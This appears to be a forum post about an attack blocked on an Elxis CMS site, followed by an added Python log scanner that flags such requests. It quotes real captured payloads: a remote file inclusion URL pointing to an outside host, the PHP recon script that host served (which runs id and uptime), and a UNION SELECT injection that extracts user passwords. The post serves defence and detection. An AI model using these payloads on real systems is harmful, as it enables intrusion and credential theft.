Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 82.197.222.145
Requested URI: /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.europeytu.com/.httpaccess/roid.txt???
DATE: 19-12-2008 01:05:10
Attack was logged
Site turned offline for 120 seconds
http://www.europeytu.com/.httpaccess/roid.txt
<?
echo "ALBANIA<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
exit;
?>
82.197.222.145 - - [19/Dec/2008:01:05:02 -0600] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.europeytu.com/.httpaccess/roid.txt??? HTTP/1.1" 200 208 "-" "libwww-perl/5.79"
19 Dec, 09:05:03 Ολλανδία 82.197.222.145 1 libWWW 5.79 libWWW 5.79
RewriteCond %{HTTP_USER_AGENT} libwww-perl.*
RewriteRule .* - [F,L]
But, is it really the agent guilty for the attack?
//index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
/com_downloads//index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
Elxis has become a famous CMS..... IT IS THE FIRST TIME I SEE AN ELXIS COMPONENT IN URLS AND NOT JOOMLA-MAMBO...
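
The question raised in the thread, whether the agent is what makes a request an attack, can be checked against the access log itself. The following is an added example (not code from the thread or from Elxis) that flags the two request shapes quoted on this page, a URL passed as a parameter value and a comment-padded UNION SELECT, without consulting the user agent; the sample log lines, hosts and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Apache combined log format: client IP, request line, status, referer, user agent.
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')
URL_VALUE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.I)   # parameter value is a URL
SQL_COMMENT_RE = re.compile(r'/\*.*?\*/', re.S)             # /**/ used in place of spaces
UNION_SELECT_RE = re.compile(r'\bunion\s+(?:all\s+)?select\b', re.I)

def classify(uri):
    """Return sorted findings for one request URI, looking only at its query string."""
    findings = set()
    query = uri.partition("?")[2]
    for name, value in parse_qsl(query, keep_blank_values=True):
        if URL_VALUE_RE.match(value):
            findings.add("remote-include:" + name)
        if UNION_SELECT_RE.search(SQL_COMMENT_RE.sub(" ", value)):
            findings.add("sqli-union:" + name)
    return sorted(findings)

def scan(lines):
    """Classify each parseable log line; the agent is reported, never used to decide."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, uri, status, agent = m.groups()
        findings = classify(uri)
        if findings:
            hits.append({"ip": ip, "status": int(status),
                         "agent": agent, "findings": findings})
    return hits

# Constructed sample lines (documentation IPs and hosts), not taken from a real log.
_RFI = ('/index.php?option=com_letterman&task=view&Itemid='
        '&mosConfig_absolute_path=http://files.example/probe.txt???')
_SQLI = ('/index.php?option=com_downloads&func=selectfolder'
         '&filecatid=-1/**/union/**/select/**/1,2,3/**/from/**/t/*')
_FMT = '{} - - [19/Dec/2008:01:05:02 -0600] "GET {} HTTP/1.1" 200 208 "-" "{}"'
SAMPLE_LOG = [
    _FMT.format("203.0.113.7", _RFI, "libwww-perl/5.79"),
    _FMT.format("203.0.113.8", _RFI, "Mozilla/5.0 (X11; Linux)"),  # same request, other agent
    _FMT.format("203.0.113.9", _SQLI, "Mozilla/5.0 (X11; Linux)"),
    _FMT.format("203.0.113.10", "/index.php?option=com_content&id=5", "libwww-perl/5.79"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["agent"], hit["findings"])
```

A parameter that legitimately carries a URL (a return or redirect target) matches the first rule too, so treat the findings as triage input rather than a block list.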